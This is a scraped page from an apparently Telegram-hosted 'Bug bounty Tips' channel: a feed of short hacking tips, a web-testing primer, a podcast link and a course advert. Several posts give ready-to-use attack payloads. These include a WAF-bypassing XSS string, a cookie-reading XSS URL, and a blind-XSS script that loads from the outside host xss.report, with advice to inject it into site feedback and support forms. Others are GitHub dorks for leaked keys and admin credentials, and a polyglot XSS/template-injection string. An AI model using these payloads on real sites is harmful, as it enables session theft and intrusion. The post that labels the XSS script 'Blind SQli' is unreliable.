fa
Feedback
Bug bounty Tips

Bug bounty Tips

رفتن به کانال در Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

نمایش بیشتر
5 855
مشترکین
+624 ساعت
+707 روز
+36030 روز
آرشیو پست ها
A payload to bypass WAF, published by @akaclandestine <detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//

## Payload :- https://help[.]something[.]com/?search=%22%3E%3Csvg%2Fonload=confirm(document.cookie)%3E ## Tips :- nuclei -l live-subs.txt -t /root/nuclei-templates/http/vulnerabilities/generic/t top-xss-params.yaml

photo content

photo content

Find lot of bugs using this dorks in github "Target.com" language:yml "Target. com" language:yml "_key" "Target. com" language:yml "admin" "Target. com" language:yml "root" "Target. com" language:yml "host

Bug: Blind SQli Payload: ';"/></textarea></script><script/src=//xss.report/c/username></script> Inject your payload in these forms. Submit Feedback Contacts us Join Our Waitlist Customer Support check if email field type="text" <input type="text" name="email"> then inject payload in Email field

\u0022: Represents a double quote ("). \u003c: Represents a less-than sign (<). %26quot;: Represents the HTML entity for a double quote ("). %26gt;: Represents the HTML entity for a greater-than sign (>). %26lt;: Represents the HTML entity for a less-than sign (<). ';}};“>${{7*7}}: Contains JavaScript code designed to execute when the payload is injected and the page is loaded. The code includes closing the current script tag (), injecting an image tag with an onerror attribute that triggers an alert, and then a simple arithmetic expression ${{7*7}} that evaluates to 49.

\u0022\u003c%26quot;%26gt;%26lt;"';}};“>${{7*7}} My favourite xss payload

photo content

🔥First Step Toward Web Application Testing : 😎 We will always come across various web applications that are designed and configured differently. One of the most current and widely used methods for testing web applications is the https://github.com/OWASP/wstg/tree/master/document/4-Web_Application_Security_Testing. ❄️ One of the most common procedures is to start by reviewing a web application's front end components, such as HTML, CSS and JavaScript (also known as the front end trinity), and attempt to find vulnerabilities such as Sensitive Data Exposure { https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure } and Cross-Site Scripting (XSS) { https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS) } . 🌓 Once all front end components are thoroughly tested, we would typically review the web application's core functionality and the interaction between the browser and the webserver to enumerate the technologies the webserver uses and look for exploitable flaws. We typically assess web applications from both an unauthenticated and authenticated perspective (if the application has login functionality) to maximize coverage and review every possible attack scenario. ✨

226 - A Heap of Linux Bugs https://dayzerosec.com/podcast/226.html

Hello guys, i hope everyone is doing well. today i am here to announce a biggest launch from cipherops till now, we are introducing a certification course name "OWPT" i.e offensive web pen testing. we have some offers going on with the registration link i will post the broucher here, anyone intrested please do register and if anyone looking for the course please do share it others also, as the training batch starts from DEC 1st , register soon. https://forms.gle/PgrQ2jA84iDLTkfA9

Bug bounty Tips - آمار و تحلیل کانال تلگرام @bugbounty_tech